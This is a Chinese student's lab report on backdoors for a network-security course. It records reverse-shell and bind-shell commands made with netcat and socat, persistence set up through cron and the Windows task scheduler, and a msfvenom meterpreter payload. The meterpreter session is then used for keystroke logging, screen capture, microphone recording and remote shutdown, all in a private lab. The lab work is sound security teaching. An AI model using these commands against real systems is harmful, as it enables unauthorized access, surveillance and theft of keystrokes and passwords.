20144303石宇森《网络对抗》后门原理与实践

20144303石宇森《网络对抗》 后门原理与实践

基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

  • 下载软件时,后门捆绑在下载的软件上,与软件一起安装进入了系统

(2)例举你知道的后门如何启动起来(win及linux)的方式?

  • Windows:用户自己运行了后门软件、设置了任务计划启动

  • linux:设置了cron启动,在到达规定的时间时后门启动

(3)Meterpreter有哪些给你映像深刻的功能?

最可怕的就是使用靶机的摄像头进行拍照和录像吧。感觉在电脑前的一举一动都能被攻击主机掌握。另外就是获取目标机键入信息的功能。确实十分强大,攻击方可以掌握我们输入的所有东西,像输入的密码、发送的消息什么的已经不算是秘密了。

细思极恐,好像只要黑客想知道的东西没有他没办法搞定的。我们这样一个简单的后门软件都能有如此强大的功能。应该是学好网络攻防,走遍天下都不怕了。

(4)如何发现自己有系统有没有被安装后门?

简单的方法就是通过杀毒软件杀毒吧。还可以查看进程列表,注册表。

实验总结与体会

实践总结:

  • 通过此次实验,掌握了一下基本内容:
  • Windows如何获取目标主机的shell:使用ncat打开监听端口,目标主机连接到端口时就获得了其shell
  • linux如何获取目标主机的shell:通过命令nc -l -p打开端口,等待目标主机连接即可获得其shell
  • 学会打开cron启动
  • 掌握打开任务计划启动的方法
  • 掌握生成后门文件的方法,并将其通过ncat或者socat传输给目标主机
  • 了解一些常见的meterpreter命令,并使用一些基本的命令攻击靶机(如使用目标机摄像头、截取目标机屏幕等)

心得体会

完成这次实验后,掌握了打开不同操作系统下打开后门的方法,学会了如何在linux下生成一个后门软件,通过实践熟悉了meterpreter的各个命令的使用方法和功能。另外,通过这次亲身实践,也体会到了黑客软件功能的强大,作为普通计算机用户的我们只要稍不留神,身上的大量信息就有可能被黑客盗取。这也从一方面说明了学好这门课程的重要性,不只是要懂得如何完成攻击,更重要的是要通过学习掌握预防攻击,反抗攻击的方法。真是实践出真知啊!

实验过程记录

一、使用netcat获取主机操作Shell,cron启动:

Windows获取linux的shell:

1、在Windows下查看主机的ip地址

884664-20170319233157526-1230946379.jpg

2、ncat.exe -l -p 4303 打开监听

884664-20170319233205151-546442389.jpg

3、nc 192.168.75.129 4303 -e /bin/sh 在linux下反弹式连接到Windows

884664-20170319233210495-678297925.jpg

4、Windows获得了linux的shell

884664-20170319233215557-1026959587.jpg

linux获得Windows的shell:

1、查看linux的ip地址

884664-20170319233226354-1247236447.jpg

2、nc -l -p 4303打开监听端口

884664-20170319233230510-1233772011.jpg

3、ncat.exe -e cmd.exe 192.168.75.128 4303 让Windows连接到linux上

884664-20170319233236432-1941410749.jpg

4、linux获得了Windows主机的shell

884664-20170319233240791-716636378.jpg

cron启动:

1、Windows打开监听端口

884664-20170319233258166-117088493.jpg

2、用指令crontab -e 对定时任务进行编辑。将最后一行修改为

45 * * * * /bin/netcat 192.168.75.129 4303 -e /bin/sh

884664-20170319233302026-1346963464.jpg

3、等到每个小时的45分时,linux会自动打开后门,获取linux的shell

884664-20170319233307323-53492865.jpg

二、使用socat获取主机操作Shell, 任务计划启动

1、新建一个触发器,开始任务选择工作站锁定时。

884664-20170319233319354-174274623.jpg

2、新建操作,选择启动程序,程序定位到socat.exe,参数填

tcp-listen:4303 exec:cmd.exe,pty,stderr

884664-20170319233324713-70773817.jpg

3、按ALT+L锁定计算机用户,使新建的操作触发

884664-20170319233329745-1716459735.jpg

4、此时,在linux端下使用命令socat - tcp:192.168.75.129:4303连接到Windows主机,获取Windows的shell

884664-20170319233336166-1328771501.jpg

三、使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1、使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.86.129 LPORT=5215 -f exe > 20144303.exe自动生成一个后门程序

884664-20170319233348620-1578316301.jpg

2、windows打开监听端口,等待linux传输后门文件

884664-20170319233352620-1099602396.jpg

3、kali端将后门软件传输给Windows

884664-20170319233614557-298036932.jpg

四、使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

1、输入msfconsole进入msf控制台

884664-20170319233619120-210405002.jpg

2、修改IP地址和端口号

884664-20170319233624104-1645740874.jpg

3、在windows下打开后门软件

884664-20170319233629463-974700280.jpg

4、使用exploit命令对Windows进行攻击

884664-20170319233635120-657086641.jpg

5、攻击成功,kali获得了Windows的shell

884664-20170319233640307-8095376.jpg

6、screenshot命令截取目标机的屏幕

884664-20170319233646088-1551456564.jpg

884664-20170319233721182-189855487.jpg

7、使用摄像头拍照、录像。(不知为何失败了)

884664-20170319233735510-1443499656.jpg

8、使用命令record_mic截取一段音频

884664-20170319233741745-2121730157.jpg

9、使用命令keyscan_start和keysca_dump捕获靶机的键入信息

884664-20170319233748213-1231472199.jpg

10、查看当前用户

884664-20170319233759401-1454492097.jpg

11、查看文件

884664-20170319233806182-652548951.jpg

12、命令靶机关机

884664-20170319233814526-1023976.jpg

884664-20170319233825166-907482294.jpg

转载于:https://www.cnblogs.com/20144303sys/p/6583059.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值